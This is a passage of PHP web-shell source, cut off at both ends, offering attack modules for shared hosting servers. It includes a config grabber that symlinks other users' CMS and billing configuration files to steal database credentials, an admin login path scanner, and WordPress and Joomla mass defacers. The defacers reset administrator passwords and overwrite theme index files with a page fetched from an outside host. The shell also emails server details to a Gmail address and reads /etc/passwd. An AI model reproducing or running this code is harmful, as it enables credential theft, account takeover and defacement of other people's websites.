- @symlink('/home/'.$user.'/public_html/whmc/WHM/configuration.php',$user.'-whmc-WHM.txt');
- @symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-whmcs.txt');
- @symlink('/home/'.$user.'/public_html/support/configuration.php',$user.'-support.txt');
- @symlink('/home/'.$user.'/public_html/supp/configuration.php',$user.'-supp.txt');
- @symlink('/home/'.$user.'/public_html/secure/configuration.php',$user.'-sucure.txt');
- @symlink('/home/'.$user.'/public_html/secure/whm/configuration.php',$user.'-sucure-whm.txt');
- @symlink('/home/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-sucure-whmcs.txt');
- @symlink('/home/'.$user.'/public_html/cpanel/configuration.php',$user.'-cpanel.txt');
- @symlink('/home/'.$user.'/public_html/panel/configuration.php',$user.'-panel.txt');
- @symlink('/home/'.$user.'/public_html/host/configuration.php',$user.'-host.txt');
- @symlink('/home/'.$user.'/public_html/hosting/configuration.php',$user.'-hosting.txt');
- @symlink('/home/'.$user.'/public_html/hosts/configuration.php',$user.'-hosts.txt');
- @symlink('/home/'.$user.'/public_html/configuration.php',$user.'-joomla.txt');
- @symlink('/home/'.$user.'/public_html/submitticket.php',$user.'-whmcs2.txt');
- @symlink('/home/'.$user.'/public_html/clients/configuration.php',$user.'-clients.txt');
- @symlink('/home/'.$user.'/public_html/client/configuration.php',$user.'-client.txt');
- @symlink('/home/'.$user.'/public_html/clientes/configuration.php',$user.'-clientes.txt');
- @symlink('/home/'.$user.'/public_html/cliente/configuration.php',$user.'-client.txt');
- @symlink('/home/'.$user.'/public_html/clientsupport/configuration.php',$user.'-clientsupport.txt');
- @symlink('/home/'.$user.'/public_html/billing/configuration.php',$user.'-billing.txt');
- @symlink('/home/'.$user.'/public_html/manage/configuration.php',$user.'-whm-manage.txt');
- @symlink('/home/'.$user.'/public_html/my/configuration.php',$user.'-whm-my.txt');
- @symlink('/home/'.$user.'/public_html/myshop/configuration.php',$user.'-whm-myshop.txt');
- @symlink('/home/'.$user.'/public_html/includes/dist-configure.php',$user.'-zencart.txt');
- @symlink('/home/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-shop-zencart.txt');
- @symlink('/home/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-shop-ZCshop.txt');
- @symlink('/home/'.$user.'/public_html/Settings.php',$user.'-smf.txt');
- @symlink('/home/'.$user.'/public_html/smf/Settings.php',$user.'-smf2.txt');
- @symlink('/home/'.$user.'/public_html/forum/Settings.php',$user.'-smf-forum.txt');
- @symlink('/home/'.$user.'/public_html/forums/Settings.php',$user.'-smf-forums.txt');
- @symlink('/home/'.$user.'/public_html/upload/includes/config.php',$user.'-up.txt');
- @symlink('/home/'.$user.'/public_html/article/config.php',$user.'-Nwahy.txt');
- @symlink('/home/'.$user.'/public_html/up/includes/config.php',$user.'-up2.txt');
- @symlink('/home/'.$user.'/public_html/conf_global.php',$user.'-6.txt');
- @symlink('/home/'.$user.'/public_html/include/db.php',$user.'-7.txt');
- @symlink('/home/'.$user.'/public_html/connect.php',$user.'-PHP-Fusion.txt');
- @symlink('/home/'.$user.'/public_html/mk_conf.php',$user.'-9.txt');
- @symlink('/home/'.$user.'/public_html/includes/config.php',$user.'-traidnt1.txt');
- @symlink('/home/'.$user.'/public_html/config.php',$user.'-4images.txt');
- @symlink('/home/'.$user.'/public_html/sites/default/settings.php',$user.'-Drupal.txt');
- @symlink('/home/'.$user.'/public_html/member/configuration.php',$user.'-1member.txt') ;
- @symlink('/home/'.$user.'/public_html/billings/configuration.php',$user.'-billings.txt') ;
- @symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-whm.txt');
- @symlink('/home/'.$user.'/public_html/supports/configuration.php',$user.'-supports.txt');
- @symlink('/home/'.$user.'/public_html/requires/config.php',$user.'-AM4SS-hosting.txt');
- @symlink('/home/'.$user.'/public_html/supports/includes/iso4217.php',$user.'-hostbills-supports.txt');
- @symlink('/home/'.$user.'/public_html/client/includes/iso4217.php',$user.'-hostbills-client.txt');
- @symlink('/home/'.$user.'/public_html/support/includes/iso4217.php',$user.'-hostbills-support.txt');
- @symlink('/home/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-hostbills-billing.txt');
- @symlink('/home/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-hostbills-billings.txt');
- @symlink('/home/'.$user.'/public_html/host/includes/iso4217.php',$user.'-hostbills-host.txt');
- @symlink('/home/'.$user.'/public_html/hosts/includes/iso4217.php',$user.'-hostbills-hosts.txt');
- @symlink('/home/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-hostbills-hosting.txt');
- @symlink('/home/'.$user.'/public_html/hostings/includes/iso4217.php',$user.'-hostbills-hostings.txt');
- @symlink('/home/'.$user.'/public_html/includes/iso4217.php',$user.'-hostbills.txt');
- @symlink('/home/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-hostbills-hostbills.txt');
- @symlink('/home/'.$user.'/public_html/hostbill/includes/iso4217.php',$user.'-hostbills-hostbill.txt');
- }
- echo "<center><br/><br/><a href='dm_grab'><nobr><span class='b9'>CHECK CONFIG GRABBER</span></nobr><br/></a><br/><br/>";
- }
- ?>
- <?php }
- # x=ascan
- elseif(isset($_GET['x']) && ($_GET['x'] == 'ascan')){ ?>
- <form action="?dn=<?php echo $pwd; ?>&x=ascan" method="post">
- <center><br/><br/><nobr><span class="b7">O=:[ ADMIN LOGIN</span> <span class="b8">PATH SCANNER ]:=O</nobr><br/><br/> <form method="POST"> Website : <input name="target" style="color:#FF0000;background-color:#000000" size="25" value="http://"><input type="submit" style="color:#FF0000;background-color:#000000" value=" >> "></form></center>
- <?php
- $target = $_POST['target'];
- $admins = array('/admin',
- '/adminweb',
- '/safeadmin',
- '/adminweb',
- '/controlpanel',
- '/cpanel',
- '/admcp',
- '/admin.asp',
- '/sysadmin.php',
- '/useradmin',
- '/wp-admin',
- '/webadmin',
- '/SysAdmin',
- '/administer',
- '/administrator',
- '/adm',
- '/directadmin',
- '/staradmin',
- '/panel',
- '/wp-login'
- ,'/pureadmin',
- '/webmaster',
- '/ADMIN',
- '/login',
- '/paneldecontrol',
- '/administrador',
- '/admin.php',
- '/login',
- '/loign.php',
- '/administrator.php',
- '/admins.php',
- '/logins',
- '/admincp',
- '/admincp.php');
- foreach($admins as $admin) {
- $jamban = ($target).($admin);
- $get = @file_get_contents($jamban);
- if($get) {
- echo "<br>[+] FOUND : <a href='".$jamban."' target='_blank'>".$jamban."</a> [+]<br>";
- }
- }
- ?>
- <?php }
- elseif(isset($_GET['x']) && ($_GET['x'] == 'wpmass')){ ?>
- <form action="?y=<?php echo $pwd; ?>&x=wpmass" method="post">
- <?php
- ini_set("display_errors", "0");
- set_time_limit(0);
- @session_start();
- $base_path = dirname(__FILE__).'/';
- function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
- $ar0=explode($marqueurDebutLien, $text);
- $ar1=explode($marqueurFinLien, $ar0[$i]);
- return trim($ar1[0]);
- }
- function randomt() {
- $chars = "abcdefghijkmnopqrstuvwxyz023456789";
- srand((double)microtime()*1000000);
- $i = 0;
- $pass = '';
- while ($i <= 7) {
- $num = rand() % 33;
- $tmp = substr($chars, $num, 1);
- $pass = $pass . $tmp;
- $i++;
- }
- return $pass;
- }
- function index_changer_wp($conf, $content) {
- $output = '';
- $dol = '$';
- $username = entre2v2($conf,"define('DB_USER', '","');");
- $password = entre2v2($conf,"define('DB_PASSWORD', '","');");
- $dbname = entre2v2($conf,"define('DB_NAME', '","');");
- $prefix = entre2v2($conf,$dol."table_prefix = '","'");
- $host = entre2v2($conf,"define('DB_HOST', '","');");
- $link=mysql_connect($host,$username,$password);
- if($link) {
- mysql_select_db($dbname,$link) ;
- $dol = '$';
- $req1 = mysql_query("UPDATE `".$prefix."users` SET `user_login` = 'admin',`user_pass` = '0a56f86a4ea789f555c2bdfafb61fd4a' WHERE `ID` = 1");
- } else {
- $output.= "[-] DB Error<br />";
- }
- if($req1) {
- $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'");
- $data = mysql_fetch_array($req);
- $site_url=$data["option_value"];
- $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='template'");
- $data = mysql_fetch_array($req);
- $template = $data["option_value"];
- $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='current_theme'");
- $data = mysql_fetch_array($req);
- $current_theme = $data["option_value"];
- $useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";
- $url2=$site_url."/wp-login.php";
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $url2);
- curl_setopt($ch, CURLOPT_POST, 1);
- curl_setopt($ch, CURLOPT_POSTFIELDS,"log=admin&pwd=slymn123&rememberme=forever&wp-submit=Log In&testcookie=1");
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
- curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
- curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
- curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
- $buffer = curl_exec($ch);
- $pos = strpos($buffer,"action=logout");
- if($pos === false) {
- $output.= "[-] Giris Basarisiz<br />";
- } else {
- $output.= "[+] Giris Basarili<br />";
- }
- $url2=$site_url."/wp-admin/theme-editor.php?file=/themes/".$template.'/index.php&theme='.urlencode($current_theme).'&dir=theme';
- curl_setopt($ch, CURLOPT_URL, $url2);
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
- curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
- curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
- $buffer0 = curl_exec($ch);
- $_wpnonce = entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');
- $_file = entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');
- if(substr_count($_file,"/index.php") != 0){
- $output.= "[+] index.php CROT<br />";
- } else {
- $output.= "[-] index.php CROT<br />";
- }
- $url2=$site_url."/wp-admin/theme-editor.php";
- curl_setopt($ch, CURLOPT_URL, $url2);
- curl_setopt($ch, CURLOPT_POST, 1);
- curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".$content."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File");
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
- curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
- curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
- $buffer = curl_exec($ch);
- curl_close($ch);
- $pos = strpos($buffer,'<div id="message" class="updated">');
- $cond = 0;
- if($pos === false) {
- $output.= "[-] index.php CROT<br />";
- } else {
- $output.= "[+] index.php CROT<br />";
- $cond = 1;
- }
- } else {
- $output.= "[-] DB Error<br />";
- }
- global $base_path;
- unlink($base_path.'COOKIE.txt');
- return array('cond'=>$cond, 'output'=>$output);
- }
- function exec_mode_1($def_url) {
- @mkdir('sym',0777);
- $wr = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
- $fp = @fopen ('sym/.htaccess','w');
- fwrite($fp, $wr);
- @symlink('/','sym/root');
- $dominios = @file_get_contents("/etc/named.conf");
- @preg_match_all('/.*?zone "(.*?)" {/', $dominios, $out);
- $out[1] = array_unique($out[1]);
- $numero_dominios = count($out[1]);
- echo "Toplam Site: $numero_dominios <br><br />";
- $def = file_get_contents($def_url);
- $def = urlencode($def);
- $base_url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/sym/root/home/';
- $output = fopen('defaced.html', 'a+');
- $_SESSION['count1'] = (isset($_GET['st']) && $_GET['st']!='') ? (isset($_SESSION['count1']) ? $_SESSION['count1'] :0 ) : 0;
- $_SESSION['count2'] = (isset($_GET['st']) && $_GET['st']!='') ? (isset($_SESSION['count2']) ? $_SESSION['count2'] :0 ) : 0;
- echo '<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th>
- <th>SID</th><th>Domain</th><th>Script</th><th>DM</th><th>dm</th></tr>';
- $j = 1;
- $st = (isset($_GET['st']) && $_GET['st']!='') ? $_GET['st'] : 0;
- for($i = $st; $i <= $numero_dominios; $i++)
- {
- $domain = $out[1][$i];
- $dono_arquivo = @fileowner("/etc/valiases/".$domain);
- $infos = @posix_getpwuid($dono_arquivo);
- $config02 = @file_get_contents($base_url.$infos['name']."/public_html/wp-config.php");
- $cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';
- if($config02 && preg_match('/DB_NAME/i',$config02)){
- echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
- echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
- $res = index_changer_wp($config02, $def);
- echo '<td>'.$res['output'].'</td>';
- if($res['cond']) {
- echo '<td align="center"><span class="green">HACKED</span></td>';
- fwrite($output, 'http://'.$domain."<br>");
- $_SESSION['count2'] = $_SESSION['count2'] + 1;
- } else {
- echo '<td align="center"><span class="red">BASARISIZ</span></td>';
- }
- echo '</tr>';
- }
- }
- echo '</table>';
- echo '<hr/>';
- echo 'TOTAL Deface = '.($_SESSION['count1']+$_SESSION['count2']).'<br />';
- }
- echo '<!DOCTYPE html>
- <html>
- <head>
- <title>WP Mass Defacer</title>
- <script type="text/javascript">
- function change() {
- if(document.getElementById(\'rcd\').checked == true) {
- document.getElementById(\'tra\').style.display = \'\';
- } else {
- document.getElementById(\'tra\').style.display = \'none\';
- }
- }
- function hide() {
- document.getElementById(\'tra\').style.display = \'none\';
- }
- </script>
- </head>
- <body>
- <div style="background: rgba(0,0,0,0.5);padding:90px 0 65px 0;">
- <h2 style="color:#0066FF;text-align: center;">Wordpress Mass Defacer</h2>';
- if(!isset($_POST['form_action'])){ echo '<div align="center">
- <form action="" method="post">
- <input type="hidden" name="form_action" value="1"><br>index url:
- <input type="text" style="color:#FF0000;background-color:#000000" name="indexadresi" value="http://site.com/index.html" /><br>
- <input class=submit style="color:#FF0000;background-color:#000000" type="submit" value="!! START !!" name="Submit">
- </form>
- </div>';
- }
- echo '<div align="center">';
- if($_POST['form_action'] == 1) {
- exec_mode_1($_POST['indexadresi']);
- }
- echo '</div>
- </div>
- </body>
- </html>';
- ?>
- <?php }
- elseif(isset($_GET['x']) && ($_GET['x'] == 'jomass')){ ?>
- <form action="?y=<?php echo $pwd; ?>&x=jomass" method="post">
- <html>
- <?
- ini_set("display_errors", "0");
- set_time_limit(0);
- @session_start();
- echo "<p> <center> <font color=red font face='tahoma' size='6pt'>AUTOMATIC JOOMLA DEFACER </center></font> </p>";
- //mail feature
- $body=("server ip:".$_SERVER['SERVER_ADDR']." "."Site Name:".$_SERVER['SERVER_NAME']." "."Directory".dirname(__FILE__));
- mail('proxyhoax@gmail.com',$_SERVER['SERVER_ADDR'],$body);
- $base_url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']);
- //create symlink of / to /sym/root/
- @mkdir('sym',0777);
- $wr = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
- $fp = @fopen ('sym/.htaccess','w');
- fwrite($fp, $wr);
- @symlink('/','sym/root');
- //collecting site names
- $text=file_get_contents($base_url.'/sym/root/var/named/');
- $ar = explode('<li><a href="', $text);
- for($vi=2;$vi < count($ar);$vi++)
- {
- $var1 = strtok($ar[$vi], " ");
- $var1 = substr($var1,0,-2);
- $old=('.db');
- $new=('');
- $sites = str_replace($old , $new , $var1);
- $filename = 'sites.txt';
- $fp = fopen($filename, "a+");
- $write = fputs($fp, $sites."\n");
- fclose($fp);
- }
- //collecting domainuser names for sites
- $domainusers=file('sites.txt');
- foreach ($domainusers as $domainuser) {
- $textexec=("ls -la /etc/valiases/".$domainuser);
- $exec=exec($textexec);
- $filename = 'lsla.txt';
- $fp = fopen($filename, "a+");
- $write = fputs($fp, $exec."\n");
- fclose($fp);
- }
- //creating final domain and domain user list
- $lsla=file('lsla.txt');
- foreach ($lsla as $finaldom) {
- $user=entre2v2($finaldom,"-rw-r----- 1 "," mail");
- $site=substr(strstr($finaldom, '/etc/valiases'),14);
- $filename = 'bhung.txt';
- $fp = fopen($filename, "a+");
- $write = fputs($fp, $user.":". $site." ");
- fclose($fp);
- }
- $f=file_get_contents('bhung.txt');
- $finals=explode(" ",$f);
- foreach ($finals as $final){
- $strlen=('6');
- $dr=strlen ($final);
- if ($dr < $strlen) {
- $filename = 'faltu.txt';
- $fp = fopen($filename, "a");
- $write = fputs($fp, $final);
- fclose($fp);
- }
- else {
- $filename = 'gold.txt';
- $fp = fopen($filename, "a");
- $write = fputs($fp, $final."\n");
- fclose($fp);
- }
- }
- //delete ajaira text files
- unlink ('bhung.txt');
- unlink ('faltu.txt');
- unlink ('lsla.txt');
- unlink ('sites.txt');
- $h=file_get_contents('http://dmzone-defacer.tk/index.html');
- $url=($base_url);
- $a=file($base_url.'/gold.txt');
- echo ("<center><table border=1 cellspacing=1 cellpading=1>
- <tr> <th width=200>Domain User</th> <th width=250>Website Name</td><th width=100>CMS</td><th width=200>Status</td></tr>");
- foreach ($a as $final) {
- list($user, $site_url) = explode(":", $final);
- $site_urlto = substr($site_url, 0, -1);
- $url2=($url."/sym/root/home/".$user."/public_html/configuration.php");
- $configs=file_get_contents($url2);
- $old=('$');
- $new=('hax0rsistz');
- $configfile = str_replace($old , $new , $configs);
- $username=entre2v2($configfile, "hax0rsistzuser = '","';");
- $password=entre2v2($configfile, "hax0rsistzpassword = '","';");
- $dbname=entre2v2($configfile, "hax0rsistzdb = '","';");
- $dbprefix=entre2v2($configfile, "hax0rsistzdbprefix = '","';");
- $strlendbprefix= strlen ($dbprefix);
- if ($strlendbprefix > 2) {
- $link=mysql_connect("localhost",$username,$password) ;
- mysql_select_db($dbname,$link) ;
- $tryChaningInfo = mysql_query("UPDATE ".$dbprefix."users SET username ='Yabod1' , password = 'af9083d4b82dbc0745b124db3b3cf15d:M0WuLowO4rtRTddG' where usertype='Super Administrator'");
- //checking pass change
- $reqpass=('af9083d4b82dbc0745b124db3b3cf15d:M0WuLowO4rtRTddG');
- $checkpass= mysql_query("SELECT password FROM ".$dbprefix."users where username='Yabod1'");
- $showpass=mysql_fetch_array ($checkpass);
- if ($showpass[0]== $reqpass) {
- $filename = 'passchanged.txt';
- $fp = fopen($filename, "a+");
- $write = fputs($fp, $site_url."\n");
- fclose($fp);
- //upto this alright
- $req =mysql_query("SELECT * from `".$dbprefix."extensions` ");
- $co=randomt();
- if ( $req )
- {
- $req =mysql_query("SELECT * from `".$dbprefix."template_styles` WHERE client_id='0' and home='1'");
- $data = mysql_fetch_array($req);
- $template_name=$data["template"];
- $req =mysql_query("SELECT * from `".$dbprefix."extensions` WHERE name='".$template_name."'");
- $data = mysql_fetch_array($req);
- $template_id=$data["extension_id"];
- $urlto=$site_urlto."/administrator/index.php";
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $urlto);
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($ch, CURLOPT_HEADER, 1);
- curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
- curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
- curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
- $buffer = curl_exec($ch);
- $return=entre2v2($buffer ,'<input type="hidden" name="return" value="','"');
- $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',4);
- ///////////////////////////
- $urlto=$site_urlto."/administrator/index.php";
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $urlto);
- curl_setopt($ch, CURLOPT_POST, 1);
- curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=1&option=com_login&task=login&return=".$return."&".$hidden."=1");
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
- curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
- curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
- $buffer = curl_exec($ch);
- $pos = strpos($buffer,"com_config");
- if($pos === false) {
- }
- else {
- }
- ///////////////////////////
- $urlto=$site_urlto."/administrator/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $urlto);
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
- curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
- curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
- $buffer = curl_exec($ch);
- $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',2);
- if($hidden2) {
- }
- else {
- }
- $urlto=$site_urlto."/administrator/index.php?option=com_templates&layout=edit";
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $urlto);
- curl_setopt($ch, CURLOPT_POST, 1);
- curl_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$h."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save");
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
- curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
- curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
- $buffer = curl_exec($ch);
- $pos = strpos($buffer,'<dd class="message message">');
- if($pos === false) {
- echo "<center><table border=1 cellspacing=1 cellpading=1>
- <tr><td width=200><font color=green> $user</font></td><td width=250><font color=green> $site_url<font></td><td width=100><font color=green> Joomla</font></td><td width=200><font color=red> Failed </font></td></tr></table></center>";
- }
- else {
- $deftempurl=("http://".$site_urlto."/templates/".$template_name."/index.php");
- $filename = 'deftemp.txt';
- $fp = fopen($filename, "a+");
- $write = fputs($fp, $deftempurl."\n");
- fclose($fp);
- echo "<center><table border=1 cellspacing=1 cellpading=1>
- <tr><td width=200><font color=green> $user</font></td><td width=250><font color=green> $site_url<font></td><td width=100><font color=green> Joomla</font></td><td width=200><font color=green> Defaced </font></td></tr></table></center>";
- }
- }
- else
- {
- $req =mysql_query("SELECT * from `".$dbprefix."templates_menu` WHERE client_id='0'");
- $data = mysql_fetch_array($req);
- $template_name=$data["template"];
- $urlto=$site_urlto."/administrator/index.php";
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $urlto);
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($ch, CURLOPT_HEADER, 1);
- curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
- curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
- curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
- $buffer = curl_exec($ch);
- $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',3);
- $urlto=$site_urlto."/administrator/index.php";
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $urlto);
- curl_setopt($ch, CURLOPT_POST, 1);
- curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=1&option=com_login&task=login&".$hidden."=1");
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
- curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
- curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
- $buffer = curl_exec($ch);
- $pos = strpos($buffer,"com_config");
- if($pos === false) {
- }
- else {
- }
- $urlto=$site_urlto."/administrator/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name;
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $urlto);
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
- curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
- curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
- $buffer = curl_exec($ch);
- $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',6);
- if($hidden2) {
- }
- else {
- }
- $urlto=$site_urlto."/administrator/index.php?option=com_templates&layout=edit";
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $urlto);
- curl_setopt($ch, CURLOPT_POST, 1);
- curl_setopt($ch, CURLOPT_POSTFIELDS,"filecontent=".$h."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0");
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
- curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
- curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
- $buffer = curl_exec($ch);
- $pos = strpos($buffer,'<dd class="message message fade">');
- if($pos === false) {
- echo "<center><table border=1 cellspacing=1 cellpading=1>
- <tr><td width=200><font color=green> $user</font></td><td width=250><font color=green> $site_url<font></td><td width=100><font color=green> Joomla</font></td><td width=200><font color=red> Failed </font></td></tr></table></center>";
- }
- else {
- $deftempurl=("http://".$site_urlto."/templates/".$template_name."/index.php");
- $filename = 'deftemp.txt';
- $fp = fopen($filename, "a+");
- $write = fputs($fp, $deftempurl."\n");
- fclose($fp);
- echo "<center><table border=1 cellspacing=1 cellpading=1>
- <tr><td width=200><font color=green> $user</font></td><td width=250><font color=green> $site_url<font></td><td width=100><font color=green> Joomla</font></td><td width=200><font color=green> Defaced </font></td></tr></table></center>";
- }
- }
- //upto this alright
- }
- else {
- }
- }
- else {
- }
- }
- $cntpasschanged=file('passchanged.txt');
- $countpasschanged= count ($cntpasschanged);
- echo("<br>");
- $defacedurl=('<a href="deftemp.txt" target="_blank">View List of Defaced Site</a><br />');
- $passchangedurl=('<a href="passchanged.txt" target="_blank">View List of Password Changed site</a><br />');
- echo "<center><table border=1 cellspacing=1 cellpading=1>
- <td width=300><font color=green> $defacedurl</font></td><td width=300><font color=green> $passchangedurl </font></td></tr></table></center>";
- //declaring function entre2v2
- function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
- $ar0=explode($marqueurDebutLien, $text);
- $ar1=explode($marqueurFinLien, $ar0[$i]);
- return trim($ar1[0]);
- }
- function randomt() {
- $chars = "abcdefghijkmnopqrstuvwxyz023456789";
- srand((double)microtime()*1000000);
- $i = 0;
- $pass = '' ;
- while ($i <= 7) {
- $num = rand() % 33;
- $tmp = substr($chars, $num, 1);
- $pass = $pass . $tmp;
- $i++;
- }
- return $pass;
- }
- ?>
- <?php }
- # x=reseller
- elseif(isset($_GET['x']) && ($_GET['x'] == 'reseller')){ ?>
- <form action="?dm=<?php echo $pwd; ?>&x=reseller" method="post">
- <?php
- echo '<br><br><body bgcolor=black><center>
- <img src="http://www.nextgenhost.net/icons/logo-cpanel-whm.png"><br/><br/>
- <nobr><b><span class="b7">O=:[ CPANEL</span> <span class="b8">GRABBER ]:=O</nobr></span><br/><br/>
- <form method="POST">
- <center>
- <textarea style="color:red;background-color:#000000" cols="60" name="passwd" rows="20">';
- $uSr=file("/etc/passwd");
- foreach($uSr as $usrr)
- {
- $str=explode(":",$usrr);
- echo $str[0]."\n";
- }
- ?>
- </textarea><p>
- <nobr><font style="color:red;background-color:#000000">
- [~] Home :
- <select style="color:red;background-color:#000000" title="Select Target Home" name="home" size="10">
- <option title="home" value="home">home</option>
- <option title="home2" value="home2">home2</option>
- <option title="home3" value="home3">home3</option>
- <option title="home4" value="home4">home4</option>
- <option title="home5" value="home5">home5</option>
- <option title="home6" value="home6">home6</option>
- <option title="home7" value="home7">home7</option>
- <option title="home8" value="home8">home8</option>
- <option title="home9" value="home9">home9</option>
- <option title="home10" value="home10">home10</option>
- </select> [~] Htaccess :
- <select style="color:red;background-color:#000000" title="Select Software" name="soft" size="10">
- <option title="Apache" value="Options all
- Options +Indexes
- Options +FollowSymLinks
- DirectoryIndex Sux.html
- AddType text/plain .php
- AddHandler server-parsed .php
- AddType text/plain .html
- AddHandler txt .html
- Require None
- Satisfy Any">Apache</option>
- <option title="Litespeed" value="
- Options +FollowSymLinks
